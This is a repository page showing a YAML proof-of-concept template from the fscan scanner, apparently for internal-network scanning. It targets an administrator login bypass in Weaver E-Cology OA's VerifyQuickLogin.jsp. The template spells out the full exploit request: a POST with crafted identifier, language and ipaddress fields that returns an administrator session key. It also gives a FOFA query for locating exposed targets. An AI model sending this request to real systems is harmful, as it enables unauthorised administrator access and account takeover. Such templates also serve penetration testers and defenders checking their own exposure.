Files
fscan/webscan/pocs/ecology-verifyquicklogin-login-bypass.yaml
T
ZacharyZcR 3ef7a1beee
测试构建 / 代码检查 (push) Has been cancelled
测试构建 / 单元测试和构建 (push) Has been cancelled
测试构建 / 构建验证 (push) Has been cancelled
feat: expand internal network poc coverage
2026-07-16 02:04:36 +08:00

22 lines
729 B
YAML

id: ecology-verifyquicklogin-login-bypass
info:
name: 泛微OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞
author: zan8in
severity: high
verified: true
description: |-
泛微OA E-Cology VerifyQuickLogin.jsp文件中存在任意管理员登录漏洞,攻击着通过发送特殊的请求包可以获取管理员Session
fofa: app="泛微-协同办公OA"
tags: weaver,ecology,bypass
created: 2023/06/23
rules:
r0:
request:
method: POST
path: /mobile/plugin/VerifyQuickLogin.jsp
body: identifier=1&language=1&ipaddress=x.x.x.x
expression: response.status == 200 && response.body.bcontains(b'"sessionkey":') && response.body.bcontains(b'"message":')
expression: r0()